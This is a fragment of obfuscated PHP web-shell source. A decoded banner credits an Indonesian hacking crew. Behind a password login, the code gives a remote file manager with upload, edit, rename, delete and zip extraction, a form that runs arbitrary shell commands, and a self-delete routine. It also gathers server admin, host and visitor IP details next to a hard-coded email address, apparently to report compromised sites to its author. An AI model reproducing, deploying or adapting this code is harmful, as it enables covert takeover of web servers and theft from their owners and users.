"\x57\x65\x20\x41\162\145\x20\x3a\x20\x3c\142\162\76\12\11\11\11\x20\x20\x20\x20\112\151\156\x7a\x6f\x20\x2d\40\x4c\157\x72\x64\56\101\143\151\x6c\40\55\40\x53\121\114\x34\67\56\151\144\x20\x2d\x20\x2e\57\105\170\157\x72\x63\x69\163\x6d\61\63\x33\67\x20\x2d\40\123\145\x63\165\162\151\164\x79\x5f\110\165\156\164\x65\162\x7a\x20\55\40\103\x72\141\x7a\x79\x43\154\x6f\x77\x6e\x5a\172\40\55\x20\x4c\x61\163\x74\x63\141\x72\137\112\x69\x68\x6f\x6f\x64\40\x2d\x20\115\162\56\111\120\x20\x2d\x20\123\171\63\162\x69\146\142\x30\171\x20\x2d\40\115\162\x2e\123\171\x6e\x31\60\137\x31\x30\x20\55\40\x43\x4c\101\x59\71\67\x20\x2d\x20\104\x65\166\x69\x6c\x21\x48\x75\156\x74\145\x72\40\74\x62\162\x3e\x3c\142\162\76\12\11\x9\11\x9"; echo "\x47\162\145\x65\x74\x7a\x20\72\x20\x3c\142\x72\76\x49\x6e\144\x6f\x58\x70\154\x6f\151\164\x20\55\40\130\x61\x69\40\123\x79\x6e\144\151\x63\x61\164\x65\40\x2d\x20\x54\171\x70\151\143\141\x6c\40\111\144\x69\157\164\40\123\x65\143\165\162\151\x74\171\40\x2d\40\x43\157\156\67\x65\170\x74"; echo "\74\150\x72\x3e\74\142\162\x3e\x3c\57\143\145\156\164\145\162\x3e"; } elseif (isset($_GET[hex("\153\x69\x6c\154\x73\x65\154\x66")])) { unset($_SESSION[md5($_SERVER["\110\x54\x54\x50\x5f\110\x4f\x53\124"])]); @unlink(__FILE__); print "\x3c\x73\143\x72\151\x70\164\x3e\x77\x69\x6e\x64\157\167\x2e\x6c\x6f\x63\141\x74\x69\x6f\156\75\47\x3f\x27\x3b\x3c\57\163\x63\162\x69\160\x74\x3e"; } elseif (isset($_GET[hex("\154\157\x67\157\x75\x74")])) { unset($_SESSION[md5($_SERVER["\110\x54\x54\x50\x5f\x48\117\123\124"])]); print "\74\x73\143\162\151\160\x74\x3e\167\x69\x6e\144\x6f\x77\56\154\x6f\143\141\164\151\157\x6e\x3d\47\77\x27\x3b\x3c\57\x73\143\162\151\x70\x74\x3e"; } elseif (isset($_GET["\x6e"])) { echo $a_ . "\53\x46\x49\x4c\105" . $b_ . "\xa\x9\11\x9\x9\11\x9\x9\x9\x9\74\x66\x6f\162\x6d\x20\x61\x63\164\x69\157\156\75\x22\x22\40\x6d\145\x74\x68\157\x64\x3d\42\160\157\x73\x74\42\x3e\12\x9\x9\11\11\x9\x9\11\x9\x9\11\x3c\151\x6e\160\x75\x74\40\x6e\x61\x6d\145\x3d\42\156\x22\40\141\165\164\157\143\x6f\x6d\160\154\x65\164\x65\75\42\157\146\x66\42\x20\143\154\x61\163\x73\x3d\42\x66\x6f\162\x6d\55\x63\x6f\156\x74\x72\157\x6c\x20\143\x6f\x6c\55\x6d\144\55\63\x22\x20\164\x79\160\145\75\42\164\x65\170\164\x22\40\x76\x61\x6c\165\145\75\x22\42\76\12\11\x9\x9\x9\11\x9\x9\x9\x9\11" . $d_ . "\12\x9\x9\x9\11\x9\x9\x9\x9" . $c_; if (isset($_POST["\x6e"])) { if (!$GNJ[25]($_POST["\156"])) { ER(); } else { OK(); } } } elseif (isset($_GET["\162"])) { echo $a_ . uhex($_GET["\162"]) . $b_ . "\12\x9\x9\x9\11\x9\11\11\11\x9\x3c\x66\x6f\x72\x6d\40\141\x63\x74\x69\x6f\x6e\x3d\x22\42\40\155\145\x74\x68\x6f\x64\x3d\x22\x70\x6f\163\x74\42\x3e\12\11\11\11\x9\11\11\11\x9\11\x9\74\151\156\160\x75\x74\x20\156\x61\155\x65\75\42\162\x22\40\x61\165\164\x6f\143\157\x6d\160\x6c\145\164\145\x3d\42\157\x66\x66\x22\x20\143\154\141\163\163\x3d\42\146\157\162\155\x2d\x63\x6f\x6e\x74\162\x6f\x6c\x20\143\157\154\x2d\155\144\x2d\63\x22\40\164\171\160\x65\x3d\x22\x74\145\170\x74\x22\x20\x76\141\x6c\x75\x65\75\42" . uhex($_GET["\162"]) . "\42\76\12\x9\11\x9\11\11\11\x9\x9\11\x9" . $d_ . "\12\11\x9\x9\x9\x9\11\x9\11" . $c_; if (isset($_POST["\162"])) { if ($GNJ[26]($_POST["\x72"])) { ER(); } else { if ($GNJ[27](uhex($_GET["\162"]), $_POST["\x72"])) { OK(); } else { ER(); } } } } elseif (isset($_GET["\172"])) { $zip = new ZipArchive(); $res = $zip->open(uhex($_GET["\172"])); if ($res === TRUE) { $zip->extractTo(uhex($_GET["\x64"])); $zip->close(); OK(); } else { ER(); } } else { echo "\74\164\141\142\x6c\145\40\143\154\x61\x73\x73\40\x3d\x20\x22\x74\141\x62\x6c\x65\40\164\x61\x62\x6c\x65\55\x62\157\x72\x64\145\162\x65\x64\x20\155\x74\55\63\x22\x20\x3e\xa\x9\x9\11\x9\11\x9\x3c\164\150\145\141\144\x3e\12\x9\x9\11\11\x9\11\11\x3c\x74\162\x3e\12\11\11\x9\x9\11\11\x9\11\74\x74\150\76\x3c\x63\145\156\x74\145\x72\x3e\40\x4e\101\115\x45\x20\x3c\x2f\143\x65\156\x74\x65\162\x3e\74\57\x74\x68\76\xa\x9\x9\x9\x9\11\x9\x9\x9\x3c\164\x68\x3e\x3c\x63\145\156\x74\x65\x72\76\x20\124\x59\x50\105\x20\74\57\143\x65\156\164\145\x72\x3e\74\57\x74\150\76\12\x9\x9\x9\11\11\11\11\11\x3c\164\150\x3e\74\x63\x65\156\164\x65\162\76\40\123\111\132\105\40\74\57\143\x65\156\164\145\x72\x3e\x3c\x2f\164\150\x3e\xa\x9\11\11\11\x9\x9\x9\11\74\x74\x68\x3e\x3c\x63\145\x6e\164\x65\162\76\40\114\x41\123\124\40\x4d\x4f\104\111\106\111\105\x44\x20\74\57\x63\x65\156\164\x65\162\x3e\x3c\x2f\x74\x68\x3e\xa\x9\x9\11\x9\x9\11\11\x9\x3c\x74\150\76\74\x63\145\156\x74\x65\162\76\40\117\x57\x4e\105\122\134\x47\x52\x4f\125\x50\40\74\x2f\x63\x65\156\164\145\x72\76\x3c\57\164\150\76\xa\x9\x9\11\11\x9\x9\11\x9\74\164\150\x3e\x3c\x63\x65\x6e\164\145\162\76\x20\120\105\122\x4d\111\123\x53\111\117\116\x20\x3c\x2f\x63\x65\156\164\145\162\x3e\x3c\x2f\164\150\x3e\12\x9\x9\11\11\11\11\x9\11\x3c\164\150\76\74\x63\145\156\x74\145\x72\x3e\40\101\103\x54\111\117\x4e\40\74\x2f\x63\145\156\x74\145\x72\76\74\57\164\150\x3e\12\11\x9\x9\11\x9\11\x9\74\57\164\162\76\12\x9\11\x9\11\x9\x9\74\57\x74\x68\145\x61\144\76\12\x9\x9\11\x9\11\x9\x3c\164\x62\157\144\x79\76\12\11\11\x9\11\11\x9\11\xa\x9\x9\11\x9\11\11"; $h = ''; $j = ''; $w = $GNJ[13]($d); if ($GNJ[28]($w) || $GNJ[29]($w)) { foreach ($w as $c) { $e = $GNJ[14]("\134", "\x2f", $d); if (!$GNJ[30]($c, "\56\x7a\x69\160")) { $zi = ''; } else { $zi = "\x3c\141\40\150\x72\145\x66\x3d\x22\77\x64\x3d" . hex($e) . "\x26\x7a\75" . hex($c) . "\42\x3e\125\74\57\141\x3e"; } if ($GNJ[31]("{$d}\x2f{$c}")) { $o = ''; } elseif (!$GNJ[32]("{$d}\57{$c}")) { $o = "\x20\x68"; } else { $o = "\x20\167"; } $s = $GNJ[34]("{$d}\x2f{$c}") / 1024; $s = round($s, 3); if ($s >= 1024) { $s = round($s / 1024, 2) . "\40\115\102"; } else { $s = $s . "\40\x4b\x42"; } if ($c != "\x2e" && $c != "\56\56") { $GNJ[8]("{$d}\x2f{$c}") ? $h .= "\74\164\x72\x20\143\x6c\141\x73\x73\x3d\42\162\x22\x3e\12\11\11\x9\11\x9\x9\x9\74\x74\144\x3e\12\11\x9\11\11\11\x9\11\x9\x3c\x69\x6d\147\x20\163\162\143\40\x3d\40\x22\x68\x74\x74\x70\x73\x3a\57\x2f\x63\x64\156\60\56\151\x63\157\x6e\x66\x69\x6e\144\x65\162\x2e\143\x6f\x6d\57\144\x61\x74\141\x2f\x69\143\157\x6e\163\57\x69\x63\x6f\x6e\151\x63\157\x2d\63\57\x31\x30\x32\x34\x2f\66\63\56\160\x6e\x67\42\40\x77\151\144\x74\x68\x20\x3d\40\x22\x32\x30\x70\170\x22\x20\x68\145\151\x67\150\x74\x20\x3d\x20\x22\62\x30\160\170\42\76\12\x9\11\11\11\x9\11\x9\x9\x3c\141\x20\143\154\141\163\163\75\x22\141\x6a\x78\42\40\x68\x72\145\x66\x3d\42\x3f\144\x3d" . hex($e) . hex("\57" . $c) . "\x22\x3e" . $c . "\x3c\x2f\x61\76\12\11\x9\11\11\x9\x9\11\x3c\x2f\x74\x64\76\xa\11\11\x9\x9\x9\x9\x9\x3c\164\144\76\x3c\143\x65\x6e\x74\x65\162\x3e\x44\x69\162\74\x2f\143\145\156\164\x65\x72\76\74\57\x74\144\x3e\12\11\x9\x9\x9\11\11\11\74\x74\144\x20\143\x6c\141\x73\163\75\42\x78\42\x3e\12\x9\11\11\11\x9\x9\11\11\74\x63\145\156\x74\x65\x72\76\55\x3c\x2f\x63\145\x6e\164\x65\x72\76\12\11\11\11\11\x9\11\11\x3c\57\164\x64\x3e\12\x9\11\11\x9\11\x9\x9\12\x9\x9\11\x9\11\11\x9\x3c\x74\x64\x20\x63\x6c\141\163\x73\x3d\42\x78\42\76\12\x9\x9\x9\11\x9\11\x9\74\143\x65\x6e\x74\145\162\x3e\xa\x9\x9\x9\11\11\11\x9\11\74\x61\x20\x63\154\141\x73\x73\75\x22\x61\152\x78\x22\x20\x68\162\x65\x66\75\42\x3f\144\x3d" . hex($e) . "\46\164\x3d" . hex($c) . "\x22\76" . $GNJ[20]("\x46\x20\144\40\x59\40\147\x3a\x69\72\163", $GNJ[21]("{$d}\x2f{$c}")) . "\x3c\57\x61\76\12\x9\11\x9\11\11\11\11\11\x3c\57\x63\x65\x6e\164\x65\x72\x3e\12\x9\x9\x9\11\x9\11\11\x3c\57\x74\x64\x3e\12\x9\11\x9\x9\x9\11\11\x3c\164\144\40\143\x6c\x61\x73\163\x20\75\x20\x22\170\x22\x3e\xa\x9\x9\11\x9\11\11\11\x3c\143\145\156\164\145\x72\76\xa\11\11\x9\x9\11\11\11" . $dirinfo["\157\x77\156\145\x72"] . DIRECTORY_SEPARATOR . $dirinfo["\x67\162\x6f\165\x70"] . "\12\11\x9\x9\11\x9\11\11\74\x2f\143\145\156\164\145\162\x3e\12\11\x9\11\x9\x9\x9\11\x3c\x2f\164\x64\x3e\xa\11\11\x9\x9\x9\x9\11\x3c\164\x64\40\x63\x6c\x61\163\x73\x3d\42\x78\x22\76\12\11\x9\x9\11\11\11\x9\x3c\143\145\x6e\x74\145\x72\x3e\xa\11\x9\x9\x9\x9\11\x9\x9\74\141\x20\143\x6c\141\x73\163\x3d\x22\141\x6a\x78" . $o . "\x22\x20\150\x72\145\146\x3d\42\77\144\75" . hex($e) . "\46\153\x3d" . hex($c) . "\x22\x3e" . x("{$d}\57{$c}") . "\74\x2f\141\x3e\12\11\x9\x9\11\x9\11\x9\x3c\x2f\x63\145\156\164\x65\162\76\xa\x9\11\x9\11\11\x9\11\x3c\x2f\164\144\x3e\xa\x9\11\11\x9\11\x9\x9\x3c\164\144\40\x63\x6c\141\163\x73\x3d\x22\x78\42\76\12\11\x9\11\x9\11\x9\x9\x3c\x63\x65\156\164\x65\x72\x3e\12\11\x9\11\11\x9\11\x9\x9\74\141\40\143\x6c\x61\x73\x73\x3d\42\141\152\170\x22\40\150\x72\145\x66\x3d\42\77\144\x3d" . hex($e) . "\x26\x72\75" . hex($c) . "\42\x3e\122\x65\x6e\141\155\145\x3c\57\141\76\xa\x9\11\11\11\11\x9\11\11\74\141\x20\143\154\141\163\163\x3d\42\141\152\170\x22\x20\x68\162\x65\146\75\x22\77\144\x3d" . hex($e) . "\x26\170\x3d" . hex($c) . "\42\76\x44\x65\x6c\145\164\x65\x3c\57\x61\x3e\xa\x9\11\x9\x9\x9\x9\x9\11\74\57\x63\145\156\164\x65\162\x3e\xa\11\11\11\x9\x9\11\x9\x3c\57\164\x64\76\12\11\x9\11\x9\11\11\x3c\x2f\x74\162\76\12\x9\x9\x9\11\x9\11\12\11\x9\x9\11\x9\x9" : ($j .= "\74\164\162\x20\143\154\x61\x73\x73\x3d\x22\x72\42\76\xa\x9\x9\x9\x9\11\x9\x9\x3c\x74\x64\76\xa\11\x9\x9\x9\x9\x9\x9\12\11\11\x9\x9\11\11\11\x9\74\x69\155\147\x20\x73\162\x63\x20\x3d\x20\x22\x68\164\164\160\163\x3a\57\57\151\x6d\x67\56\x69\143\157\156\163\70\x2e\x63\x6f\155\57\x69\x6f\163\x2f\x31\x30\x34\x2f\x30\x30\x30\x30\x30\60\x2f\x66\151\154\145\55\x66\x69\x6c\154\145\144\56\x70\x6e\147\x22\x20\x77\x69\x64\x74\x68\40\75\x20\42\62\60\x70\x78\x22\40\x68\x65\151\x67\150\164\40\75\x20\x22\x32\60\160\x78\42\76\xa\11\x9\x9\x9\x9\11\x9\11\74\141\x20\143\154\141\x73\163\75\42\x61\152\x78\x22\x20\x68\x72\145\146\75\x22\x3f\x64\x3d" . hex($e) . "\46\x73\x3d" . hex($c) . "\x22\76" . $c . "\x3c\x2f\141\x3e\12\11\x9\11\x9\11\x9\x9\x9\xa\x9\11\11\x9\11\11\x9\x3c\57\x74\144\x3e\xa\11\x9\11\11\x9\11\x9\x3c\x74\x64\x3e\xa\x9\x9\x9\x9\x9\x9\x9\x3c\143\x65\x6e\164\145\x72\76\xa\x9\x9\11\x9\11\11\x9\106\x69\154\145\12\11\x9\x9\x9\x9\x9\x9\x3c\57\x63\145\x6e\164\x65\162\x3e\12\x9\x9\x9\11\11\x9\x9\x3c\57\x74\x64\x3e\12\x9\11\x9\11\11\x9\11\74\164\x64\40\143\154\141\x73\x73\75\x22\x78\x22\x3e\12\x9\x9\x9\x9\11\11\11\x3c\x63\x65\x6e\x74\x65\162\x3e\12\x9\11\11\11\11\x9\11\11" . $s . "\12\11\11\x9\x9\x9\11\11\11\x3c\57\x63\145\156\x74\x65\x72\76\xa\11\11\11\11\11\11\11\74\57\x74\x64\x3e\xa\11\11\x9\x9\11\x9\11\74\164\144\x20\x63\154\x61\163\x73\x3d\x22\170\42\x3e\xa\x9\x9\x9\x9\x9\x9\11\74\143\145\x6e\x74\145\162\76\12\x9\11\11\x9\11\x9\11\11\x3c\x61\40\x63\x6c\141\163\x73\75\x22\x61\152\170\x22\40\x68\162\x65\x66\75\x22\77\x64\75" . hex($e) . "\x26\x74\75" . hex($c) . "\x22\x3e" . $GNJ[20]("\106\x20\x64\x20\x59\40\x67\x3a\151\x3a\163", $GNJ[21]("{$d}\57{$c}")) . "\x3c\x2f\x61\76\12\11\11\11\11\11\x9\x9\x9\x3c\x2f\x63\145\x6e\164\x65\162\76\12\x9\x9\11\11\11\11\x9\x3c\x2f\x74\144\76\x9\12\x9\11\11\x9\11\11\11\x3c\164\144\76\12\x9\x9\x9\11\x9\x9\11\x3c\x63\x65\x6e\x74\145\162\x3e\xa\x9\x9\11\x9\x9\11\x9" . $dirinfo["\x6f\x77\156\145\x72"] . DIRECTORY_SEPARATOR . $dirinfo["\147\x72\157\x75\x70"] . "\xa\11\x9\x9\11\x9\x9\11\74\x2f\x63\x65\x6e\164\x65\162\76\xa\x9\11\x9\x9\11\11\11\74\57\164\144\76\12\x9\x9\x9\11\11\x9\x9\11\74\164\144\x20\143\x6c\x61\x73\163\x3d\x22\170\x22\76\12\x9\x9\11\x9\x9\x9\x9\x9\x3c\143\145\156\x74\x65\162\76\12\x9\11\11\11\11\x9\x9\74\x61\40\143\x6c\x61\163\x73\x3d\x22\x61\152\x78" . $o . "\42\x20\150\x72\145\x66\x3d\x22\77\144\x3d" . hex($e) . "\x26\153\75" . hex($c) . "\42\76" . x("{$d}\57{$c}") . "\x3c\x2f\141\x3e\xa\x9\x9\11\x9\11\x9\x9\74\57\x63\x65\x6e\164\x65\162\x3e\xa\11\x9\x9\11\x9\11\11\x3c\57\x74\144\76\xa\x9\x9\11\x9\11\11\x9\12\11\x9\x9\11\x9\11\x9\x3c\164\x64\40\x63\154\x61\x73\x73\75\42\x78\x22\76\xa\x9\x9\11\11\11\x9\11\x9\74\143\145\x6e\164\145\162\x3e\xa\x9\x9\x9\11\11\x9\x9\11\74\141\x20\x63\x6c\141\x73\163\x3d\42\141\152\170\42\40\150\x72\145\146\75\42\77\x64\75" . hex($e) . "\46\x65\x3d" . hex($c) . "\x22\x3e\x45\144\x69\x74\x3c\x2f\141\x3e\12\x9\11\11\11\x9\11\11\x9\x3c\x61\40\x63\154\141\163\163\75\x22\x61\x6a\170\42\40\x68\x72\145\146\75\x22\x3f\144\75" . hex($e) . "\x26\162\x3d" . hex($c) . "\x22\x3e\x52\145\x6e\x61\155\145\74\x2f\x61\x3e\xa\11\11\11\x9\x9\11\11\11\74\x61\x20\x68\162\145\x66\x3d\x22\x3f\x64\75" . hex($e) . "\46\x67\x3d" . hex($c) . "\42\76\104\157\167\x6e\x6c\x6f\x61\144\74\x2f\x61\76\12\11\x9\11\x9\x9\x9\x9\11" . $zi . "\xa\11\x9\x9\11\x9\11\x9\x9\x3c\x61\40\143\154\141\x73\163\x3d\42\x61\x6a\170\x22\x20\150\x72\145\146\x3d\42\77\144\75" . hex($e) . "\46\170\x3d" . hex($c) . "\x22\x3e\x44\145\154\145\164\145\x3c\57\141\76\xa\11\x9\11\x9\11\11\11\11\74\57\143\x65\x6e\164\145\x72\76\12\11\x9\x9\x9\x9\x9\11\x3c\57\164\144\x3e\xa\11\11\x9\x9\x9\x9\74\x2f\164\162\x3e\12\11\x9\x9\x9\11\x9\12\11\11\11\x9\11\11"); } } } echo $h; echo $j; echo "\74\x2f\164\x62\x6f\144\x79\x3e\12\11\x9\x9\x9\x9\12\11\11\11\x9\x3c\x2f\x74\x61\x62\x6c\145\76"; } goto Jewqe; jCWj1: function hex($n) { $y = ''; for ($i = 0; $i < strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y; } goto ypfD9; JYoTv: $b_ = "\x3c\x2f\164\x68\76\xa\11\x9\11\x9\x9\x9\x9\74\x2f\x74\x72\x3e\xa\11\11\11\x9\x9\11\74\x2f\x74\x68\x65\141\x64\76\xa\x9\11\x9\11\11\x9\x3c\x74\x62\x6f\144\171\x3e\xa\x9\11\x9\x9\x9\x9\x9\x3c\x74\x72\76\xa\x9\11\x9\11\x9\11\11\x9\74\x74\144\76\74\57\164\x64\x3e\xa\x9\x9\x9\11\x9\11\11\74\x2f\164\162\76\xa\11\11\x9\x9\x9\x9\11\x3c\164\x72\76\12\11\11\x9\11\x9\11\11\x9\x3c\164\x64\x20\x63\x6c\141\163\163\x3d\42\x78\x22\x3e"; goto yz2gd; QTE_S: $EL_MuHaMMeD .= "\123\145\162\166\145\162\40\101\144\155\151\156\40\72\40" . $_SERVER["\x53\x45\122\x56\x45\122\x5f\x41\104\x4d\111\x4e"] . "\15\xa"; goto k4jQM; PMPzS: foreach ($k as $m => $l) { if ($l == '' && $m == 0) { echo "\74\141\x20\x63\x6c\141\x73\x73\x3d\x22\x61\x6a\170\x22\x20\150\162\145\146\x3d\42\x3f\144\x3d\x32\146\42\76\x2f\74\57\x61\x3e"; } if ($l == '') { continue; } echo "\74\x61\40\x63\154\141\x73\x73\x3d\42\x61\152\x78\x22\40\150\x72\x65\146\x3d\42\77\x64\75"; for ($i = 0; $i <= $m; $i++) { echo hex($k[$i]); if ($i != $m) { echo "\62\x66"; } } echo "\x22\76" . $l . "\74\x2f\141\76\x2f"; } goto PKgUw; RKF2n: echo hex($d); goto rx78F; e_nYa: function OS() { return substr(strtoupper(PHP_OS), 0, 3) === "\x57\x49\x4e" ? "\x57\x69\156\144\157\x77\163" : "\x4c\x69\156\165\x78"; } goto MHSBI; gKKnj: for ($i = 0; $i < $___; $i++) { $GNJ[] = uhex($Array[$i]); } goto YtA8M; d2RdT: @clearstatcache(); goto qlmbl; nr5UH: ?>
<div class="u">
<form method="post" enctype="multipart/form-data">
<label class="l w"><br>
<input type="file" name="n[]" onchange="this.form.submit()" multiple class="form-control mr-3">
</label>
</form>
<?php goto t9D2r; TiAGv: echo "\x3c\x66\157\162\155\40\155\145\x74\150\157\144\75\x27\x70\157\163\164\x27\76\74\x63\x65\156\164\145\162\x3e\12\11\x9\11\x9\74\146\157\156\x74\40\x63\157\154\157\x72\x20\75\40\47\x72\145\x64\x27\x3e" . $user . "\x40" . gethostbyname($_SERVER["\x48\124\124\120\137\110\x4f\123\124"]) . "\72\40\176\40\44\x20\x3c\57\x66\157\156\164\x3e\x26\156\142\163\160\73\12\x9\11\11\11\x3c\x69\156\x70\165\164\40\163\164\171\x6c\145\x3d\47\142\157\162\x64\x65\162\72\x20\156\157\156\145\73\40\x62\x6f\x72\x64\x65\x72\55\x62\x6f\164\164\x6f\155\72\x20\61\160\170\40\x73\x6f\x6c\151\144\40\x23\x30\60\60\x3b\47\40\x74\x79\160\x65\x3d\x27\x74\x65\x78\164\47\x20\163\151\172\x65\75\x27\x33\60\47\x20\150\x65\x69\x67\x68\x74\x3d\47\61\x30\47\40\156\141\155\145\75\x27\x63\x6d\144\47\76\x3c\x69\x6e\x70\165\164\40\x73\x74\x79\x6c\x65\x3d\x27\142\157\162\x64\145\x72\72\x20\x6e\157\x6e\x65\x3b\x20\142\157\162\x64\145\x72\55\142\x6f\164\x74\157\x6d\72\40\61\x70\x78\40\x73\x6f\154\151\144\x20\43\60\x30\x30\73\47\40\x74\x79\160\145\75\x27\163\165\142\x6d\x69\x74\47\40\x6e\141\x6d\145\75\x27\x64\x6f\137\x63\155\x64\x27\x20\x76\141\154\x75\145\75\47\76\x3e\47\76\12\x9\x9\x9\11\x3c\x2f\143\145\156\x74\145\162\x3e\74\x2f\x66\157\x72\155\x3e"; goto APZgc; XD1SR: ?>
&<?php goto zBNUP; HvClU: $a_ = "\x3c\x74\141\142\x6c\x65\x20\143\145\154\154\163\160\x61\143\151\x6e\x67\75\x22\x30\x22\40\143\145\154\154\x70\141\144\x64\x69\x6e\147\x3d\x22\x37\42\40\x77\x69\x64\164\150\x3d\42\61\x30\60\x25\42\76\xa\x9\x9\x9\x9\x9\11\74\x74\x68\145\x61\144\76\12\11\11\11\x9\11\11\11\x3c\x74\162\x3e\12\11\x9\11\11\11\x9\x9\11\x3c\x74\x68\76"; goto JYoTv; HwInW: $dir = scandir(path()); goto vrboX; eA7X7: print "\x3c\142\162\76"; goto oRSvi; P7F_7: function OK() { global $GNJ, $d; $GNJ[38]($GNJ[9]); header("\x4c\157\x63\x61\164\x69\x6f\156\x3a\40\x3f\144\75" . hex($d) . "\x26\61"); die; } goto gjCiw; zBNUP: echo hex("\156\145\x74\x77\157\x72\x6b"); goto PFmL3; bFYNI: $show_exec = !empty($safemode_exec_dir) ? "\117\x46\x46" : "\117\116"; goto dUjt0; qH131: function windisk() { $letters = ''; $v = explode("\134", path()); $v = $v[0]; foreach (range("\101", "\x5a") as $letter) { $bool = $isdiskette = in_array($letter, array("\x41")); if (!$bool) { $bool = is_dir("{$letter}\x3a\134"); } if ($bool) { $letters .= "\x5b\40\x3c\x61\40\x68\162\145\146\75\x27\77\x64\151\162\75{$letter}\72\134\x27" . ($isdiskette ? "\x20\x6f\156\143\x6c\151\x63\153\75\x22\162\x65\x74\165\x72\156\x20\x63\x6f\156\x66\x69\162\x6d\x28\47\115\141\x6b\145\x20\163\165\162\x65\x20\164\150\x61\x74\x20\164\150\x65\x20\144\x69\x73\x6b\x65\x74\164\x65\40\151\163\x20\151\x6e\x73\145\162\x74\145\144\40\x70\162\157\x70\145\x72\154\x79\x2c\40\x6f\x74\x68\145\162\x77\x69\163\x65\x20\141\x6e\x20\145\x72\162\x6f\162\x20\155\141\171\x20\157\143\x63\165\162\56\47\51\x22" : '') . "\76"; if ($letter . "\x3a" != $v) { $letters .= $letter; } else { $letters .= color(1, 2, $letter); } $letters .= "\74\x2f\141\76\x20\135"; } } if (!empty($letters)) { print "\104\x65\164\x65\x63\164\145\144\40\104\x72\151\x76\145\x73\x20{$letters}\x3c\142\x72\76"; } if (count($quicklaunch) > 0) { foreach ($quicklaunch as $item) { $v = realpath(path() . "\x2e\56"); if (empty($v)) { $a = explode(DIRECTORY_SEPARATOR, path()); unset($a[count($a) - 2]); $v = join(DIRECTORY_SEPARATOR, $a); } print "\x3c\141\x20\150\162\x65\146\x3d\47" . $item[1] . "\x27\76" . $item[0] . "\74\57\x61\x3e"; } } } goto AYlYt; rx78F: ?>
&<?php goto CwgRm; g7kGv: echo hex($d); goto SlGCP; SEdNH: @ini_set("\x64\151\x73\x70\x6c\141\x79\x5f\145\162\162\157\x72\163", 0); goto n2Ago; t9D2r: $o_ = array("\74\163\143\162\151\x70\164\76\x24\x2e\x6e\157\x74\x69\x66\x79\50\x22", "\x22\x2c\x20\173\x20\143\x6c\x61\x73\163\116\x61\x6d\145\72\x22\61\x22\x2c\141\165\x74\157\x48\151\144\x65\104\x65\154\141\171\x3a\40\62\x30\x30\x30\x2c\160\x6f\x73\151\x74\151\x6f\156\72\x22\x6c\145\146\x74\40\142\157\x74\x74\157\x6d\x22\40\175\x29\x3b\74\x2f\163\143\162\151\160\164\76"); goto Ogzh2; APZgc: if ($_POST["\x64\157\x5f\x63\x6d\144"]) { echo "\x3c\x70\162\145\76" . exe($_POST["\x63\155\x64"]) . "\74\x2f\160\x72\x65\76"; } goto HvClU; AYlYt: ini_set("\144\x69\x73\160\x6c\141\171\x5f\x65\x72\x72\x6f\x72\x73", FALSE); goto MNnsd; R4ec1: echo hex($d); goto lAjin; Bb2fs: set_time_limit(0); goto Pjama; HF7pj: $g = $o_[0] . "\x46\141\x69\x6c\x65\144\41" . $o_[1]; goto v2QYS; bAArr: ?>
&<?php goto kf2_2; z99GC: if (!isset($_SESSION[md5($_SERVER["\110\x54\124\120\x5f\x48\x4f\x53\124"])])) { if (empty($password) || isset($_POST["\x70\x61\x73\x73\167\x6f\162\x64"]) && md5($_POST["\160\x61\x73\163\x77\x6f\162\x64"]) == $password) { $_SESSION[md5($_SERVER["\x48\124\x54\x50\x5f\110\117\x53\124"])] = true; } else { login_shell(); } } goto ioq2X; hK4iP: ?>
&<?php goto u0Uo5; kYwcm: $perl = exe("\160\x65\x72\x6c\40\x2d\55\x68\x65\x6c\160") ? "\x4f\116" : "\x4f\106\x46"; goto EGDxf; PFmL3: ?>
">Network</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto mkR7V; T4ghk: $password = "\x64\x39\141\x65\60\62\x62\67\143\63\64\x35\x36\142\142\x63\62\63\x65\146\x37\63\145\71\63\x62\143\x32\143\70\x38\141"; goto ji2w1; A5BFp: $EL_MuHaMMeD .= "\101\166\154\141\156\x61\x6e\40\x53\x69\x74\145\40\72\40" . $_SERVER["\110\x54\124\x50\x5f\x48\117\x53\x54"] . "\xd\12"; goto eyEKQ; Gyn42: $kime = "\142\171\150\145\162\x6f\x34\64\100\147\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"; goto YVf7P; w7WSH: echo hex("\141\x75\164\x6f\137\x74\157\157\154\163"); goto Uca8b; we56n: $linkcr = "\x4c\x69\x6e\153\x3a\40" . $_SERVER["\123\105\122\x56\105\122\x5f\116\101\x4d\105"] . '' . $_SERVER["\122\x45\x51\x55\x45\x53\124\x5f\x55\122\x49"] . "\x20\x2d\x20\111\120\x20\x45\170\143\165\x74\151\156\147\x3a\40{$ip_remote}\40\55\40\x54\x69\x6d\145\72\x20{$time_shell}"; goto O92SG; Ckujt: $show_obdir = !empty($open_basedir) ? "\x4f\106\x46" : "\x4f\116"; goto bFYNI; bwr7D: ?>
<?php goto VC6la; ZnHFS: $oracle = function_exists("\157\x63\151\137\x63\157\156\156\145\x63\x74") ? "\117\116" : "\x4f\x46\106"; goto Ckujt; vrboX: foreach ($dir as $folder) { $dirinfo["\x70\x61\x74\x68"] = path() . DIRECTORY_SEPARATOR . $folder; if (!is_dir($dirinfo["\160\141\x74\150"])) { continue; } $dirinfo["\x6c\x69\156\x6b"] = $folder === "\56\x2e" ? "\74\141\x20\150\162\145\x66\75\x27\77\x64\x69\x72\75" . dirname(path()) . "\x27\x3e{$folder}\x3c\x2f\x61\x3e" : ($folder === "\56" ? "\74\x61\40\x68\x72\x65\146\75\47\77\144\x69\x72\75" . path() . "\47\76{$folder}\74\57\141\x3e" : "\x3c\x61\x20\x68\x72\x65\146\75\47\77\144\151\162\75" . $dirinfo["\x70\141\x74\150"] . "\47\x3e{$folder}\x3c\57\x61\76"); if (function_exists("\160\x6f\x73\151\x78\x5f\x67\145\164\160\x77\x75\x69\144")) { $dirinfo["\157\167\x6e\145\x72"] = (object) @posix_getpwuid(fileowner($dirinfo["\x70\141\164\150"])); $dirinfo["\157\x77\156\x65\x72"] = $dirinfo["\157\167\x6e\x65\162"]->name; } else { $dirinfo["\x6f\167\x6e\145\x72"] = fileowner($dirinfo["\160\141\164\150"]); } if (function_exists("\160\x6f\x73\151\x78\137\147\x65\x74\x67\x72\147\x69\x64")) { $dirinfo["\x67\x72\x6f\165\x70"] = (object) @posix_getgrgid(filegroup($dirinfo["\160\141\x74\150"])); $dirinfo["\x67\162\x6f\x75\x70"] = $dirinfo["\147\162\x6f\x75\x70"]->name; } else { $dirinfo["\147\162\157\x75\160"] = filegroup($dirinfo["\160\x61\x74\x68"]); } } goto e_nYa; Bo2yb: 